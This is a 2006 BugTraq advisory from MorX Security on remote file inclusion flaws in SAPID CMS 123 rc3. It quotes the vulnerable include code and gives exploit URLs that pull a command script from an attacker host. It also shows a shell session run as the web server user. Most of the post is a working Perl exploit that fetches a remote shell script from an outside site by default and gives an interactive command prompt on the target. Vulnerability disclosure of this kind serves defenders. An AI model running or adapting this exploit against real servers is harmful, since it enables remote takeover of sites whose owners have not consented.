BugTraq
SAPID CMS remote File Inclusion vulnerabilities Aug 07 2006 02:42PM
simo64 morx org
########################################################################
#

# Title: SAPID CMS remote File Inclusion Vulnerabilities

#

# Author: Simo64 <simo64_at_morx_org>

#

# Discovered: 06 Aout 2006

#

# MorX Security Research Team

#

# http://www.morx.org

#

# Vendor : SAPID CMS

#

# Version : 123 rc3

#

# Website : http://sapid.sourceforge.net

#

# Severity: Critical

#

# Details:

#

#

# [+] Remote File Inclusion

#

# 1) vulnerable code in usr/extensions/get_infochannel.inc.php lines( 8 - 9 )

#

# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");

# include($root_path."usr/system/common_extfunctions.inc.php"); }

#

# 2) vulnerable code in usr/extensions/get_tree.inc.php lines( 9 - 10 )

#

# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");

# include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php");
}

#

# $root_path , $GLOBALS["root_path"] variable are not sanitized ,before it can be used to include files

#

# [-] Exploit :

#

# http://localhost/usr/extensions/get_infochannel.inc.php?root_path=http:/
/attacker/cmd.txt?cmd=id;pwd

#

# http://localhost/usr/extensions/get_tree.inc.php?GLOBALS["root_path"]=ht
tp://attacker/cmd.txt?cmd=id;pwd

#

#======================================

# Poc Remote Command Execution Exploit:

#======================================

#

# http://www.morx.org/sapid.txt

#

# C:\>perl sapid.pl http://127.0.0.1

#

# ===============================================================

# = SAPID 123_rc3 (rootpath) Remote Command Execution Exploit =

# ===============================================================

# = MorX Security Research Team - www.morx.org =

# = Coded by Simo64 - simo64 (at) www.morx (dot) org [email concealed] =

# ===============================================================

# simo64 (at) morx (dot) org [email concealed] :~$ id; pwd; ls

# uid=48(apache) gid=48(apache) groups=48(apache)

# get_calendar.inc.php

# get_filter_list.inc.php

# get_gb_records.inc.php

# get_infochannelfilter.inc.php

# get_infochannel.inc.php

# get_rss.inc.php

# get_searchresults.inc.php

# get_survey.inc.php

# get_track.inc.php

# get_tree.inc.php

# soap_call.inc.php

# /home/public_html/sapid/usr/extensions

# simo64 (at) morx (dot) org [email concealed] :~$ exit

#

# Enjoy !

#

#!/usr/bin/perl

use LWP::Simple;

print "\n===============================================================\n";

print "= SAPID 123_rc3 (rootpath) Remote Command Execution Exploit =\n";

print "===============================================================\n";

print "= MorX Security Research Team - www.morx.org =\n";

print "= Coded by Simo64 - simo64\@www.morx.org =\n";

print "===============================================================\n\n";

my $targ,$rsh,$path,$con,$cmd,$data,$getit ;

$targ = $ARGV[0];

$rsh = $ARGV[1];

if(!$ARGV[1]) {$rsh = "http://zerostag.free.fr/sh.txt";}

if(!@ARGV) { &usage;exit(0);}

chomp($targ);

chomp($rsh);

$path = $targ."/usr/extensions/get_infochannel.inc.php";

$con = get($path) || die "[-]Cannot connect to Host";

sub usage(){

print "Usage : perl $0 host/path [OPTION]\n\n";

print "Exemples : perl $0 http://127.0.0.1\n";

print " perl $0 http://127.0.0.1 http://yoursite/yourcmd.txt\n\n";

}

while ()

{

print "simo64\@morx.org :~\$ ";

chomp($cmd=<STDIN>);

if ($cmd eq "exit") { print "\nEnjoy !\n\n";exit(0);}

$getit = $path."?root_path=".$rsh."?&cmd=".$cmd;

$data=get($getit);

if($cmd eq ""){ print "Please enter command !\n"; }

else{ print $data ;}

}

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus